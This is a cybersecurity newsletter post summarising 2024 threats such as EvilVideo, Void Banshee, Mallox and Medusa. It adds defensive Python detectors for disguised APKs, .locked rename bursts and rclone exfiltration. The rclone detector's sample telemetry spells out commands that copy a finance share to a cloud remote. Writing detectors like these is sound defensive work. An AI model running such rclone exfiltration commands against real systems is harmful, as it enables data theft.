When the PREDATOR turns into the PREY

Hi my fellow malware enthusiast,
As you have seen in my previous post, the introduction is not my forte; let's see how this one goes... Please bear with me!
Did you know that ransomware was reported in more than 2,500 incidents in the first half of 2024, that the United States was the most-targeted country (I’m not surprised…), and, guess what, that LockBit was responsible for 67% of all incidents? (No wonder they were eager to catch them 😂)
Yeah, I know hitting you with facts as soon as you start reading is kind of rough for an introduction.
Well, it’s already done, so you might as well continue reading!
- Evil Video Exploit: A Hidden Threat in Telegram's Android App
- Void Banshee Exploits MHTML Vulnerability: Remote Code Execution Uncovered
- Mallox Ransomware Expands to Linux: New Tactics and Encryption Techniques
- When Hackers Become the Hacked: Medusa's Data Theft Exposed
- New APT Group TAG-100 Unveiled: Tools, Targets, and Tactics in Focus
- CloudSorcerer: New APT Targets Russian Government with Cloud-Based Tactics

Security researchers from ESET discovered a zero-day vulnerability called EvilVideo in Telegram's Android app. A threat actor named Ancryno was selling the exploit. This flaw allowed attackers to hide malware in video files. When users clicked on these fake videos, they were prompted to install a harmful file.
Telegram fixed this problem in version 10.14.5, released on July 11, 2024. The exploit was sold online in June 2024 and enabled attackers to spread malware through Telegram channels, groups, and chats.
💡I’m pretty sure this must have caused a lot of damage, to a lot of people…
The malicious files were disguised as 30-second videos, tricking users into downloading them. The attack worked because Telegram's API allowed these disguised files to be uploaded. However, the exploit did not affect the Web or Windows versions of Telegram. If a user clicked on the fake video, a message would pop up saying the video couldn't play in Telegram and needed an external player. If the user agreed, they were prompted to install the harmful APK file.
Additionally, users with automatic media download enabled would get the malicious files just by opening the chat or channel where they were shared.
💡When I think about it, I don’t have an Android, so I guess I was safe at that time! Were you?
👉For more details checkout this blog written by Bill Toulas.
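The core of EvilVideo, as described above, is a file whose name and 30-second preview say "video" while its bytes are an APK. The defensive counterpart is to classify attachments by content rather than by extension. The following is an added example, not code from the original post or from ESET/Telegram: it sniffs the MP4 "ftyp" box and the ZIP signature, confirms an APK by the AndroidManifest.xml and .dex members every APK carries, and flags any "video" whose content is not video. The sample MP4 header and the fake APK are constructed in the block itself.

```python
import io
import os
import zipfile
from typing import Optional

# Every MP4/ISO-BMFF family file carries "ftyp" at offset 4; an APK is a ZIP.
ZIP_SIGNATURES = (b"PK\x03\x04", b"PK\x05\x06", b"PK\x07\x08")
VIDEO_EXTENSIONS = {".mp4", ".mov", ".m4v", ".3gp"}


def _looks_like_apk(data: bytes) -> bool:
    """An APK is a ZIP that carries AndroidManifest.xml and at least one .dex."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            names = zf.namelist()
    except zipfile.BadZipFile:
        return False
    return "AndroidManifest.xml" in names and any(n.endswith(".dex") for n in names)


def sniff_container(data: bytes) -> str:
    """Classify a blob by its bytes: 'mp4', 'apk', 'zip' or 'unknown'."""
    if len(data) >= 12 and data[4:8] == b"ftyp":
        return "mp4"
    if data[:4] in ZIP_SIGNATURES:
        return "apk" if _looks_like_apk(data) else "zip"
    return "unknown"


def attachment_mismatch(filename: str, data: bytes) -> Optional[str]:
    """Return a warning when a file named like a video does not contain video."""
    ext = os.path.splitext(filename.lower())[1]
    kind = sniff_container(data)
    if ext in VIDEO_EXTENSIONS and kind != "mp4":
        return f"{filename}: named as video but content is {kind}"
    return None


def build_fake_apk() -> bytes:
    """Constructed stand-in for an APK: a ZIP with the two tell-tale members."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("AndroidManifest.xml", "<manifest/>")
        zf.writestr("classes.dex", b"dex\n035\x00")
    return buf.getvalue()


# Constructed minimal MP4 header: box size + "ftyp" box with the "mp42" brand.
FAKE_MP4 = b"\x00\x00\x00\x18ftypmp42" + b"\x00" * 24


if __name__ == "__main__":
    for name, blob in (("clip.mp4", FAKE_MP4), ("funny.mp4", build_fake_apk())):
        print(name, sniff_container(blob), attachment_mismatch(name, blob))
```

The same check applies to any messaging or mail gateway: the extension and the thumbnail are attacker-controlled, the first bytes of the file are not.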
Void Banshee Exploits MHTML Vulnerability: Remote Code Execution Uncovered

Trend Micro Zero Day Initiative (ZDI) discovered a serious vulnerability, CVE-2024-38112, that allows hackers to remotely control computers by exploiting MHTML files.
This flaw was immediately reported to Microsoft as ZDI-CAN-24433. It has been used by a hacking group called Void Banshee, which targets regions in North America, Europe, and Southeast Asia to steal information and money.
💡North America always has to be included; they just can’t be left alone😂
Void Banshee used this vulnerability as part of an attack chain involving the Atlantida malware, which has been active and evolving since January 2024. The group’s attacks use internet shortcuts and Microsoft's protocol handlers to exploit the MHTML protocol, allowing them to run malicious code through a disabled Internet Explorer on Windows systems.
Trend Micro tracked these attacks in mid-May 2024, noting that Void Banshee consistently used similar methods to carry out their operations. The MHTML code execution vulnerability enabled the attackers to infect users and organizations with the Atlantida malware.
👉Check out the blog to learn more about the vulnerability and how it’s being used!
Malware is spreading fast in 2024!
A Thales report shows 41% of businesses faced a malware attack this year, making it the fastest-growing threat. New tactics like IDAT Loader variants, steganography, and info-stealers like Chae$ 4.1 are making malware harder to detect.
Exploiting vulnerabilities is also a top attack method, with a 180% increase in such breaches, according to the Verizon 2024 Data Breach Report. Over 17,000 new vulnerabilities have been reported this year, but most organizations can only fix a fraction of them, leaving many exposed.
Mallox Ransomware Expands to Linux: New Tactics and Encryption Techniques

Mallox ransomware, also known as Fargo, TargetCompany, and Mawahelper, has been active since mid-2021 and started using a Ransomware-as-a-Service model in 2022.
Originally, Mallox used .NET-based .EXE or .DLL files to attack Windows systems, delivered through methods like phishing emails or the exploitation of exposed MS-SQL servers. Recently, Mallox has expanded to Linux systems. The attackers now use custom Python scripts to deliver the ransomware and steal information.
Once the ransomware is on a system, it encrypts the victim's files and adds a .locked extension to them.
💡Just imagine logging back on your computers and seeing all your files encrypted…
👉Want to know more? Dive into the blog for the full scoop on Mallox ransomware, also known as Fargo!
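The one observable the post gives for Mallox on a host is the .locked extension it appends to every file it encrypts. A burst of renames to that extension on a file server is a cheap, high-signal detection. The following is an added example, not code from the original post or from any vendor: it runs a sliding window per host over constructed audit records and raises one alert when the number of renames to .locked within the window crosses a threshold. The record layout, hosts and paths are all constructed for the example.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Deque, Dict, List, Tuple

# Constructed file-server audit records: (ISO timestamp, host, event, detail).
SAMPLE_FS_EVENTS = [
    ("2024-07-15T02:09:58", "srv-files", "WRITE",  "/srv/share/notes.txt"),
    ("2024-07-15T02:10:00", "srv-files", "RENAME", "/srv/share/q2.xlsx -> /srv/share/q2.xlsx.locked"),
    ("2024-07-15T02:10:01", "srv-files", "RENAME", "/srv/share/plan.docx -> /srv/share/plan.docx.locked"),
    ("2024-07-15T02:10:01", "srv-files", "RENAME", "/srv/share/a.pdf -> /srv/share/a.pdf.locked"),
    ("2024-07-15T02:10:02", "srv-files", "RENAME", "/srv/share/b.pdf -> /srv/share/b.pdf.locked"),
    ("2024-07-15T02:10:03", "srv-files", "RENAME", "/srv/share/c.pdf -> /srv/share/c.pdf.locked"),
    ("2024-07-15T02:10:04", "srv-files", "RENAME", "/srv/share/d.pdf -> /srv/share/d.pdf.locked"),
    ("2024-07-15T02:11:00", "srv-web",   "RENAME", "/var/www/old.html -> /var/www/old.html.locked"),
    ("2024-07-15T02:40:00", "srv-web",   "RENAME", "/var/www/x.html -> /var/www/x.html.locked"),
]

# Extension the post attributes to Mallox; extend the tuple for other families.
SUSPECT_EXTENSIONS = (".locked",)


def locked_rename_bursts(events, threshold: int = 5,
                         window_seconds: int = 60) -> List[Tuple[str, str]]:
    """Return (host, timestamp) for each host whose renames to a suspect
    extension reach `threshold` inside any `window_seconds` window.
    One alert per host: the first time the threshold is crossed."""
    recent: Dict[str, Deque[datetime]] = defaultdict(deque)
    alerted = set()
    alerts: List[Tuple[str, str]] = []
    for ts, host, event, detail in events:
        if event != "RENAME" or " -> " not in detail:
            continue
        new_path = detail.split(" -> ", 1)[1]
        if not new_path.lower().endswith(SUSPECT_EXTENSIONS):
            continue
        t = datetime.fromisoformat(ts)
        window = recent[host]
        window.append(t)
        # Drop renames that fell out of the window (events are time-ordered).
        while window and t - window[0] > timedelta(seconds=window_seconds):
            window.popleft()
        if len(window) >= threshold and host not in alerted:
            alerted.add(host)
            alerts.append((host, ts))
    return alerts


if __name__ == "__main__":
    for host, when in locked_rename_bursts(SAMPLE_FS_EVENTS):
        print(f"ALERT {host}: mass rename to .locked starting around {when}")
```

The single rename on srv-web half an hour apart never reaches the threshold, which is the point of the window: a user renaming one file is noise, six files in four seconds is a program.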
When Hackers Become the Hacked: Medusa's Data Theft Exposed

Recently, Buguard's Dark Atlas Squad turned the tables on the Medusa Ransomware Group during an incident. Due to a security mistake by Medusa, Buguard infiltrated their cloud account and accessed the stolen data.
Medusa used a tool called Rclone to transfer data from their victims to their cloud storage. Rclone supports over 70 cloud services, with mega.nz and mega.io being popular choices for ransomware groups. In this case, Medusa used put.io, which was discovered through a configuration file they accidentally left behind. This slip-up allowed Buguard to gain valuable insight into Medusa's operations.
💡Guys… At least do it properly. Invest in your OPSEC! Let me say it again, invest in your OPSEC!
👉Want to know more? You can read the blog about it!
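Two things in the Medusa story are directly usable by a defender: Rclone transfers to a remote are visible in process telemetry, and an rclone.conf left on a host names the backend (put.io here) the data went to. The following is an added example, not code from the original post or from Buguard: it parses constructed process-creation records for rclone copy/sync/move commands whose destination is an rclone remote, and reads a constructed rclone.conf (rclone's own INI layout, with placeholder credentials) to attach the backend type to each hit. Field names, hosts and paths are constructed; the putio backend name is rclone's real type string.

```python
import configparser
import re
from typing import Dict, List, Optional

TRANSFER_VERBS = {"copy", "sync", "move", "copyto", "moveto"}
# Flags that consume the next token, so that token must not be read as a path.
FLAGS_WITH_VALUE = {"--config", "--transfers", "--bwlimit", "--include", "--exclude"}
# rclone remote spec "name:path"; a single drive letter followed by \ or / is a local Windows path.
REMOTE_RE = re.compile(r"^(?![A-Za-z]:[\\/])[A-Za-z0-9_.-]+:")

# Constructed process-creation records (fields loosely modelled on Sysmon Event ID 1).
SAMPLE_EVENTS = [
    {"host": "fs01", "image": r"C:\Windows\System32\svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
    {"host": "fs01", "image": r"C:\ProgramData\rc\rclone.exe",
     "cmdline": r"rclone.exe copy D:\Shares\Finance cloud1:exfil/finance --config C:\ProgramData\rc\rclone.conf --transfers 16 -q"},
    {"host": "fs01", "image": r"C:\ProgramData\rc\rclone.exe", "cmdline": "rclone.exe listremotes"},
    {"host": "db02", "image": r"C:\Tools\rclone.exe", "cmdline": r"rclone.exe sync E:\Backups mega:dump"},
]

# Constructed rclone.conf in rclone's INI layout; tokens are placeholders.
SAMPLE_RCLONE_CONF = """\
[cloud1]
type = putio
token = {"access_token":"PLACEHOLDER"}

[mega]
type = mega
user = someone@example.invalid
pass = PLACEHOLDER
"""


def parse_transfer(cmdline: str) -> Optional[dict]:
    """Extract verb/source/dest from an rclone transfer command line, else None.
    Whitespace tokenising is enough for the constructed samples; real telemetry
    needs proper quote handling."""
    argv = cmdline.split()
    if len(argv) < 2:
        return None
    binary = argv[0].replace("\\", "/").rsplit("/", 1)[-1].lower()
    if binary not in ("rclone", "rclone.exe"):
        return None
    verb = argv[1].lower()
    if verb not in TRANSFER_VERBS:
        return None
    positional: List[str] = []
    skip_next = False
    for tok in argv[2:]:
        if skip_next:
            skip_next = False
            continue
        if tok in FLAGS_WITH_VALUE:
            skip_next = True
            continue
        if tok.startswith("-"):
            continue
        positional.append(tok)
    if len(positional) < 2:
        return None
    src, dst = positional[0], positional[1]
    return {"verb": verb, "source": src, "dest": dst,
            "remote_dest": bool(REMOTE_RE.match(dst))}


def find_rclone_exfil(events) -> List[dict]:
    """Flag transfers whose destination is an rclone remote (the cloud side)."""
    hits = []
    for ev in events:
        t = parse_transfer(ev["cmdline"])
        if t and t["remote_dest"]:
            hits.append({"host": ev["host"], **t})
    return hits


def remotes_from_conf(text: str) -> Dict[str, str]:
    """Map remote name -> backend type from an rclone.conf body."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(text)
    return {name: cp[name].get("type", "unknown") for name in cp.sections()}


def enrich(hits: List[dict], remotes: Dict[str, str]) -> List[dict]:
    """Attach the backend (e.g. putio) behind each destination remote name."""
    out = []
    for h in hits:
        remote_name = h["dest"].split(":", 1)[0]
        out.append({**h, "backend": remotes.get(remote_name, "unknown")})
    return out


if __name__ == "__main__":
    hits = enrich(find_rclone_exfil(SAMPLE_EVENTS), remotes_from_conf(SAMPLE_RCLONE_CONF))
    for h in hits:
        print(f'{h["host"]}: rclone {h["verb"]} {h["source"]} -> {h["dest"]} [{h["backend"]}]')
```

Matching on the binary name is the weak link: a renamed rclone binary slips past it, which is why the config-file side matters in a response. The INI layout and the `type =` key are how rclone itself stores remotes, so the same parser works on a real rclone.conf recovered from a host.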
New APT Group TAG-100 Unveiled: Tools, Targets, and Tactics in Focus

A newly discovered hacking group, TAG-100, is targeting high-profile government and private organizations, mainly in the Asia-Pacific region. This group uses open-source tools and exploits internet-facing devices to gain access. TAG-100's targets include diplomatic entities, religious groups, and political organizations critical of the Chinese government.
The researchers have found that TAG-100 uses two main tools: Pantegana and SparkRAT. Both are written in Go, an open-source programming language. Pantegana can work on various operating systems like Windows, Linux, and macOS, letting hackers remotely control infected computers. SparkRAT, another tool used by TAG-100, was previously linked to compromised networks, including a Djibouti government network.
The rise of open-source tools means that state-sponsored hackers can now outsource certain operations to less skilled groups or private contractors. This allows advanced groups to avoid using their own specialized tools, making their activities harder to detect and trace.
💡So now they’re delegating!? It’s starting to look like a business to me. What do you think?
👉For more details on this new hacker group, read this blog.
CloudSorcerer: New APT Targets Russian Government with Cloud-Based Tactics

A new APT group called CloudSorcerer has been found targeting Russian government agencies.
Discovered by Kaspersky in May 2024, CloudSorcerer uses cloud services like Microsoft Graph, Yandex Cloud, and Dropbox to hide its activities and manage its control. It also starts by using GitHub for its initial commands.
While it has some similarities to a past APT called CloudWizard, CloudSorcerer uses different malware, suggesting it's a new player using similar cloud-based methods.
👉Want to know more? You can read about it here!
Remote Code Execution Threat
A serious vulnerability in OpenSSH, known as CVE-2024-6387, has been discovered. It allows attackers to execute code remotely with root privileges on Linux systems, which means they can take full control of the system.
This has raised major concerns in the cybersecurity community.
✉️ Wrapping Up
In the world of malware, understanding is key. As we delve into these threats together, remember that knowledge and vigilance are our best allies.
If you find this newsletter helpful and know others who might benefit from it, I'd be grateful if you could pass it along. 🙏
Until next time, stay informed and keep your defenses sharp. Here’s to staying one step ahead.
Thanks for reading!